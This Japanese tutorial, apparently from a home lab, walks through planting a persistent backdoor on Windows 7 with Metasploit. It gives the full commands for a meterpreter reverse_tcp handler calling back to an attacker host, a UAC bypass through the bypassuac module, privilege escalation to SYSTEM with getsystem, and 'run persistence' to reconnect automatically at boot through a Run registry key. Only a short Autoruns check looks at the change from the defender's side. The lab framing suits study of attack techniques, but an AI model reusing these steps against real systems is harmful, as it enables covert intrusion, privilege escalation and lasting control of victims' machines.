Windows7 バックドア設置
evil.exe を実行したときのみセッションが確率されるが
通常は何度も実行することはないので
バックドアを設置する
これはWindows7 起動時に自動でペイロードを実行するように
設定をする
まず、
KaliLinux でリバースシェルを待ち受けにして
Windows 7 で evil.exe を実行
KaliLinux を起動し
1 | msfconsole |
で
Metaploit を起動
msf コンソールが起動したら
1 | use exploit /multi/handler |
でハンドラーモジュールを使用
1 | set payload windows /meterpreter/reverse_tcp |
でペイロードをセット
1 | set LHOST 192.168.1.134 |
で KaliLInux のIPアドレスを設定
1 | show options |
で設定を確認
これで
1 | exploit |
でペイロードが実行され、待受状態になるので
windows7 で evil.exe を実行
次に
1 | background |
というように
background コマンドを使い
Meterpreter セッションをバックグラウンドにして
msf プロンプトにする
次にUAC機能をバイパスするモジュールを使う
これは確率済みセッションを通して Exploit を送る
1 | use exploit /windows/local/bypassuac |
で使用するペイロードをセット
1 | show options |
でオプションで使用するセッションIDが必要なのがわかる
次に
1 | set SESSION 1 |
でセッションをセット
そして再度 reverse_tcp を設定
1 | set payload windows /meterpreter/reverse_tcp |
でペイロードをセット
1 | set LHOST 192.168.1.134 |
で KaliLInux のIPアドレスを設定
1 | show options |
で設定を確認
これで
1 | exploit |
でUAC機能をバイパスした状態で実行できる
次に権限昇格
1 | getsystem -t 1 |
これでユーザ権限を確認するとSYSTEM権限になっているのがわかる
1 | getuid |
セッションが閉じるたびに Windows 側で evil.exe を実行しないと
この手順の繰り返しになるので
Windows 7 起動時に自動でペイロードを実行するようにする
これは
run persistence コマンドを使う
オプションについては
1 | run persistence -h |
で確認できる
今回は
1 | run persistence -X -i 60 -P windows /meterpreter/reverse_tcp -p 4444 -r 192.168.1.134 |
で実行
-X でシステム起動時に自動開始
-i は接続を開始するタイミングを秒で指定
-P でペイロードの指定
-p でポート指定
-r でペイロードを実行する対象のIPアドレス
となる
つまり
今回なら
60秒間隔で
ペイロードを
4444 番ポートで
192.168.1.134 のマシンへ実行
となる
なお、Windows 7 への変更点については
Sysinternals で確認できる
Sysinternal Suites フォルダの中にある
Autoruns.exe
で起動
File > Compare で
最初に作成したarm ファイルを選択
すると
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
のところにキーが追加されているのがわかる
ここに追加された値は
c:\users\ieuser\appdata\local\temp\nhvpfroywzr.vbs
に設定されている
この状態でWindows 7 を再起動しておき
KaliLinux でリバースシェル環境を再び設定する
1 2 3 4 | use exploit /multi/handler set payload windows /meterpreter/reverse_tcp set LHOST 192.168.1.134 exploit |
を実行
すると、今回からは Windows7 で evil.exe を実行せずとも
セッションが確率されるのがわかる